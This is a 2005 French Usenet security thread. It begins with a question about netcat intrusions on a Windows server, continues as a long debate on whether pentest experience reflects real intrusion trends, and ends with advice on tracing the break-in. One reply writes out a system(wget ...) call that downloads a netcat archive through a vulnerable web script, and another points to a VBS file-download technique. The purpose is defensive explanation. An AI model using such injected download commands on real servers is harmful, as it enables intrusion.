comment bloquer les intrusitons netcat sous windows?

On 24 Feb 2005 15:25:39 GMT, Cedric Blancher <blancher@cartel-securite.fr>
wrote:

Le Thu, 24 Feb 2005 15:11:49 +0000, LaDDL a écrit :

Un pentest n'est justement pas une intrusion.
Où as-tu lu pentest = intrusion ?

Je te parle d'étude sur les _intrusions_ (les vrais, celles qui sont
arrivées)

Oui moi aussi.

et tu me dis qu'il faudrait consulter les professionnels du
pentest.

Oui car vous (ta société) nous (notre société) et les autres confrères
avons une certaine vision de la situation de la SSI fondée sur notre
expérience terrain (pas seulement limitée aux tests d'intrusion).

Pourquoi est-ce qu'ils seraient au courant des intrusions
produites sur un SI donné,

Parce que nous (l'ensemble des acteurs spécialisés en tests d'intrusion)
disposons de relations privilègiées avec certains de nos
clients/entités/réseaux/etc.

et donc de leurs causes,

Pas toujours mais cela arrive de disposer des informations par les
propriétaires du SI ou d'autres sources.

qui plus est sur un
grand nombre de SI ?

En tout cas sur leur champ d'action/intervention oui. Ensuite c'est une
question de réseaux et de relations de confiance.

Ious les tests d'intrusion réalisés en externe et en aveugle sur un SI
mettent les testeurs dans la peau de pirates informatiques & ils
agissent en simulant le comportement de personnes malveillantes.

Je te remercie encore une fois de m'expliquer mon métier,

Inutile de le rappeler je sais ce que tu fais et pour rappel on exerce
dans le même domaine mais pas exactement les mêmes fonctions et
responsabilités.

mais ça ne
fait pas avancer le schmiblick pour autant.

Je pensais expliciter les choses en précisant de la sorte. Mais on va
arriver à se comprendre. Poursuivons.

Se mettre dans le peau d'un
pirate ne te donne pas plus d'information sur le nombre de machine
piratées dans le monde et les méthodes employées.

Sur le nombre de machines piratées dans le monde non on est d'accord. Mais
sur ce point c'est une question de connaissances, de réseaux.

A propos des méthodes employées, un spécialiste en test d'intrusion se
doit de connaître les méthodes d'attaque (anciennes, actuelles, à venir).

Prenons juste les spécialisations. Tu prends un pro du pentest d'appli
web, il va te dire que c'est les applis web qui présentent le plus de
trous parce que c'est ce qu'il connaît, et surtout c'est ce qu'il
cherche quand il travaille. Est-ce que pour autant cette expérience est
généralisable à la réalité de la criminalité informatique ?
Personnellement, je ne crois pas.

Idem.
En revanche son expérience permet d'apprécier les "tendances".

Mais de quoi tu parles ??? :(

De la même chose qu'au dessus.

Okidoki.

Un ingénieur consultant en sécurité informatique spécialisé en test
d'intrusion n'est pas un pirate voyons !

Et ça l'empêcherait de généraliser ce que lui fait de manière légale sur
des systèmes à ce que font d'autres, mais de manière illégale ?
Ou alors, il faut que tu m'expliques ce que viennent faire les
pentesteurs
dans _ton_ discours.

Les démarches, les méthodes, les outils, les techniques employés pour
réaliser une attaque/intrusion sont les mêmes pour le testeur et le vrai
pirate.
Ce qui les distingue c'est le cadre dans lequel ils exécutent/réalisent
l'intrusion dans un SI :
- le premier (le testeur) est autorisé à pénétrer dans le SI et à
respecter un certain nombre de choses auprès du client
- le second (le vrai pirate) n'est pas autorisé à pénétrer dans le SI et
il fait ce qu'il veut

Ensuite les résultats de leur intrusion dans le SI ne vont pas du tout
être interprêté de la même manière.
Le testeur fera un certain nombre d'observations et recommendations à son
client. Il pourra se servir de ce test d'intrusion pour le mettre en
perspective avec ces précédentes expériences et éventuellement généraliser
sur certaines vulnérabilités observées par exemple.
Le vrai pirate pourra par exemple généraliser en se disant qu'encore une
fois aucun SI ne lui résiste et que les lignes de défense ne servent à
rien.

Pas d'accord. Les deux points de vue sont essentiels dans le cadre d'une
étude sur les intrusions dans les SI. Pourquoi ? Parce que l'on analyse
des informations avant et après l'attaque.

À la différence près que le seul des deux qui sait pourquoi et comment
s'est produit une intrusion est le mec qui a fait l'analyse.

C'est vrai.
Il arrive que les mêmes personnes réalisent des tests d'intrusion et
procèdent à l'analyse de preuves suite à une intrusion.

Si on
reprends l'étude qui affirme que 70% des machines piratée l'ont été
via une faille web, c'est le résultat d'une analyse d'incidents, donc
d'une idée de la réalité, pas de conjectures tirées de l'expérience
d'un mec qui fait des pentests et qui généralise son expérience (par
exemple, sur tous mes pentests, je rentre à 70% via une faille web) à la
réalité de la criminalité informatique.

Ici on est complétement d'accord et il n'en n'a jamais été autrement.

D'un côté tu estimes une partie de la réalité,

Oui car il y a un contexte donné et précis : cadre de l'étude.

et tu en extrapoles une
tendance,

Je n'ai rien extrapolé. Le contexte de l'étude est très clair. Le résultat
repose sur des observations. J'en tire les conclusions que je veux en
rapport avec l'expérience de notre société en SSI et précisemment tests
d'intrusion.

et de l'autre tu extrapoles une tendance d'une expérience qui
n'est pas la réalité,

Non. Je tire des conclusions d'une expérience réelle.

ne serait-ce que parce qu'un pentesteur n'est pas
un pirate,

Je le sais et tu le sais donc pourquoi fais-tu ce rappel ?

même s'il fait semblant pour les besoins de son travail.

Ca c'est son problème, celui de la société (ou sa société) pour laquelle
il travaille et des clients qui l'engagent.

Le Thu, 24 Feb 2005 21:51:57 +0000, LaDDL a écrit :

En tout cas sur leur champ d'action/intervention oui. Ensuite c'est une
question de réseaux et de relations de confiance.

Mais basée sur son champ d'action d'une part... Et sur la réalité du
fait qu'il réalise une prestation. Ça limite le périmètre, ça limite
les méthodes utilisables, et surtout, ça impose une orientation de
l'action qui amha diffère sensiblement de l'approche purement pirate.

Inutile de le rappeler je sais ce que tu fais et pour rappel on exerce
dans le même domaine mais pas exactement les mêmes fonctions et
responsabilités.

Je ne suis pas devin, et j'ai la faiblesse de ne pas croire tout ce que je
lis sur Internet...

A propos des méthodes employées, un spécialiste en test d'intrusion
se doit de connaître les méthodes d'attaque (anciennes, actuelles, à
venir).

Cela dépend _très_ fortement de l'équipe au sein de laquelle il opère.
Et même connaître des techniques ne veut pas dire qu'on les utilise. Les
sociétés spécialisées en pentest sont réputées pour leur
efficacité, mais aussi pour leurs environnements de prédilection...

En revanche son expérience permet d'apprécier les "tendances".

Personnellement, je ne pense réellement pas tirer de mes expérience de
pentests les tendances que je perçois. Mais c'est personnel.

Les démarches, les méthodes, les outils, les techniques employés pour
réaliser une attaque/intrusion sont les mêmes pour le testeur et le
vrai pirate.

Clairement pas. Ne serait-ce que parce que les SK, qui représentent une
grosse majorité des pirates, passent allègrement la phase de découverte
et d'escalade. Si je me mets à faire des pentests comme la plupart des
pirates attaquent des machines, je vais vite devoir changer de métier...
Maintenant, le "vrai pirate" n'est peut-être pas un script kiddy, mais
des études de groupes assez performants (cf. Sombria Project par exemple)
montrent que leurs méthodes s'éloigne sensiblement de celles des
pentesteurs consciencieux.

Il arrive que les mêmes personnes réalisent des tests d'intrusion et
procèdent à l'analyse de preuves suite à une intrusion.

Mais on ne contruit plus son expérience de sa seule activité de
pentesteur.


--
BOFH excuse #444:

overflow error in /dev/null

Franck Danard wrote:

Bon de toute façon, je pense mettre un linux à la longue avec des mises à
jour de CQ fréquente.

Pour monter un server/passerelle en 20mins, je te conseillerais SME
Server 6.0.1 (www.contribs.org ou tape 'Grand'Pa SME' dans Google)

Apache, FTP, Mail (IMAP, POP, SMTP), Firewall, DHCP, etc.

--
Delf

On 24 Feb 2005 22:09:08 GMT, Cedric Blancher <blancher@cartel-securite.fr>
wrote:

Le Thu, 24 Feb 2005 21:51:57 +0000, LaDDL a écrit :

En tout cas sur leur champ d'action/intervention oui. Ensuite c'est une
question de réseaux et de relations de confiance.

Mais basée sur son champ d'action d'une part... Et sur la réalité du
fait qu'il réalise une prestation. Ça limite le périmètre, ça limite
les méthodes utilisables, et surtout, ça impose une orientation de
l'action qui amha diffère sensiblement de l'approche purement pirate.

Inutile de le rappeler je sais ce que tu fais et pour rappel on exerce
dans le même domaine mais pas exactement les mêmes fonctions et
responsabilités.

Je ne suis pas devin,

Moi non plus. ;)

et j'ai la faiblesse de ne pas croire tout ce que je
lis sur Internet...

Idem.
Mais il t'est assez simple de le vérifier.

A propos des méthodes employées, un spécialiste en test d'intrusion
se doit de connaître les méthodes d'attaque (anciennes, actuelles, à
venir).

Cela dépend _très_ fortement de l'équipe au sein de laquelle il opère.
Et même connaître des techniques ne veut pas dire qu'on les utilise. Les
sociétés spécialisées en pentest sont réputées pour leur
efficacité, mais aussi pour leurs environnements de prédilection...

Peux-tu préciser ce que tu entends par environnements de prédilection ?

En revanche son expérience permet d'apprécier les "tendances".

Personnellement, je ne pense réellement pas tirer de mes expérience de
pentests les tendances que je perçois. Mais c'est personnel.

Les démarches, les méthodes, les outils, les techniques employés pour
réaliser une attaque/intrusion sont les mêmes pour le testeur et le
vrai pirate.

Clairement pas.

Bon ok t'as pas compris ce que je voulais dire et ma phrase prête à
confusion. En bref, cela signifie que dans le cadre d'un test d'intrusion
externe en aveugle le testeur (et/ou l'équipe de testeurs) se met dans la
peau d'un vrai pirate.

Ne serait-ce que parce que les SK, qui représentent une
grosse majorité des pirates, passent allègrement la phase de découverte
et d'escalade.
Si je me mets à faire des pentests comme la plupart des
pirates attaquent des machines, je vais vite devoir changer de métier...

Tu m'étonnes.

Maintenant, le "vrai pirate" n'est peut-être pas un script kiddy,
mais
des études de groupes assez performants (cf. Sombria Project par exemple)
montrent que leurs méthodes s'éloigne sensiblement de celles des
pentesteurs consciencieux.

Soyons bien d'accord pour éviter tout malentendu entre nous, un pirate et
un testeur ne se comportent pas de la même façon.

Il arrive que les mêmes personnes réalisent des tests d'intrusion et
procèdent à l'analyse de preuves suite à une intrusion.

Mais on ne contruit plus son expérience de sa seule activité de
pentesteur.

L'expérience s'acquiert par la connaissance des êtres et des choses par
leur pratique et par une confrontation plus ou moins longue de soi avec le
monde. L'expérience d'un ingénieur spécialisé en test d'intrusion repose
sur les mêmes fondements. Il ne fait pas exception.
Pour revenir au sujet initial de notre discussion, l'analyse de campagne
de tests d'intrusion peut révéler des informations intéressantes sur la
situation en SSI. C'est pourquoi je pense qu'il faut que nous (les
professionnels de la SSI) publions beaucoup plus ce type d'étude.

Le Fri, 25 Feb 2005 10:10:16 +0000, LaDDL a écrit :

Mais il t'est assez simple de le vérifier.

;)

Peux-tu préciser ce que tu entends par environnements de prédilection ?

Il est des gens qui se spécialisent, parce qu'on ne peut pas exceller
partout. Tu trouves donc des experts des environnements Windows, d'autres
sous Unix, d'autres sur les applis web en général, voir tournant sur
certains environnements en particuliers, etc. Et on trouve même des
sociétés qui elles-mêmes ont des domaines de spécialisation, par choix
ou par la force des choses (les gens qui vont et viennent par exemple). Et
de ce fait, leur vision est biaisée parce que limitées à leurs domaines
de prédilection et d'activité.

Pour revenir au sujet initial de notre discussion, l'analyse de campagne
de tests d'intrusion peut révéler des informations intéressantes sur
la situation en SSI. C'est pourquoi je pense qu'il faut que nous (les
professionnels de la SSI) publions beaucoup plus ce type d'étude.

Oui.


--
[...] C'est aussi mon avis. Il reigne par ici une frenesie autour du GMP
tout a fait inquietante... (Et la je suis encore bon pour le GMP,
surtout que je fais 3 lignes, comme par hasard) ;o)
-+- ED in Guide du Macounet Pervers : Hasard (?) frénétique -+-

Sebastien Vincent <svincent@idems.fr> wrote:

De plus on parle de sécurité (tout a rajoutant quelques
services si je te suis) alors je recommande OpenBSD (protection
contre les buffer Overflow, securité par défaut, créateur de
Packet Filter).

Purée, un trollomètre tout neuf !

Non, sérieusement, tous les BSD de ce point de vue se valent, dans la
mesure où les corrections des uns sont immédiatement implantées dans les
autres.

XAv

Nan c'est pas un troll :) C'est vrai que c'est en revanche une question
de "point de vue"/affection :)

Amicalement,

Seb :)

Ious les tests d'intrusion réalisés en externe et en aveugle sur un SI
mettent les testeurs dans la peau de pirates informatiques & ils
agissent en simulant le comportement de personnes malveillantes.

Je ne suis pas vraiment d'accord.
Un périmètre est défini avant le test et tu dois rester dans ce
périmètre si d'une part tu veux être en accord avec ce que te demande le
client et d'autre part être dans une situation plus ou moins légale.
Le pirate lui a un périmètre plus vaste :-)

Typiquement, si tu veux attaquer un serveur web hébergé chez un
hébergeur, tu ne pourras pas passer par la machine trouée d'à coté... ou
l'appli co-hébergée, alors que le pirate lui pourra trouver ça plus simple.

Enfin, les pentesteurs vont montrer un certain nombre de trous,
exploitables ou exploités, peuvent parfois montrer qu'une machine est
compromise, mais leur tâche s'arrête souvent là. On sait qu'il y a des
trous, on sait comment certains trous ont été utilisés, quant à en faire
une généralité, cela me semble difficile.

Un bon plan à mon avis pour avoir une vision assez panoramique est de
bosser dans la cellule audit d'un grand compte, là il doit y avoir des
choses à voir, et de façon globale, même si cela reste propre à une entité.

--
Quelques documents sur les systèmes et réseaux
<http://www.lalitte.com>

A mon avis,
on peut toujours te conseiller d'utiliser linux mais c'est une solution
fourre-tout. Comme si passer à la version apache de linux te sauvait.
Certes, le pirate sous linux aurait une marge de manoeuvre moins importante
(en tant que user "nobody" ou "www-data" (à vérifier cepandant, aux vues
des derniers petits exploits pour notre cher kernel (cf uselib)) mais ce
n'est pas linux qui empéchera le pirate d'installer nc si apache n'est pas
à jour.
Au passage, sous linux, un appel à
system(wget "http://www.securityfocus.com/data/tools/nc11nt.zip")
aurait permis de te faire télécharger netcat très facilement (ici l'archive
uniquement)
Sous windows, je ne sais pas trop comment celà aurait été possible en ligne
de commande (mais ça l'est peut être).

Bref, si ton apache est à jour (et ton windows l'est aussi tant qu'a faire),
le problème vient probablement de l'un de tes scripts (ou même d'un script
public). Il suffit que tu ai installé un forum phpbb (version < 2.0.11 pour
prendre un exemple récent) pour qu'un simple appel d'url un peu réfléchie
provoque l'exécution d'un petit script et mette en place le serveur en
écoute.

Sincèrement, une analyse poussée de tes logs d'apache te sera d'une grande
utilité, tu pourrait y détecter facilement une url contenant un appel à un
serveur pirate contenant un binaire de netcat par exemple.
(aide toi de la date de détection de netcat par symantec même si je déplore
que netcat soit détecté comme un troyen) pour analyser tes logs.

Si effectivement tu utilise un serveur ftp (j'ai du raté le post dans ce
cas), vérifie que celui-ci est à sa dernière version. Le cas échéant, ne
cherche pas plus loin, une vulnérabilité sur un serveur ftp devient très
rapidement critique !


Bonne chance dans ta recherche.

On 28 Feb 2005 23:39:43 GMT, Gros-Bibi <the_big_rouph@caramail.com>:

system(wget "http://www.securityfocus.com/data/tools/nc11nt.zip")

Sous windows, je ne sais pas trop comment celà aurait été possible en ligne
de commande (mais ça l'est peut être).

Ben... la même chose. Je me vois mal utiliser sérieusement une machine
Windows sans y installer au préalable wget, netcat et quelques autres.

--
;-)

On Mon, 28 Feb 2005 23:39:43 +0000, Gros-Bibi wrote:

Sous windows, je ne sais pas trop comment celà aurait été possible en
ligne de commande (mais ça l'est peut être).

Si on crée le fichier VBS kivabien, il est possible de télécharger des
fichiers en ligne de commande. Pour un exemple (sans passage de
paramètre), voir http://www.paulsadowski.com/WSH/getremotebinaryfile.htm


Nicob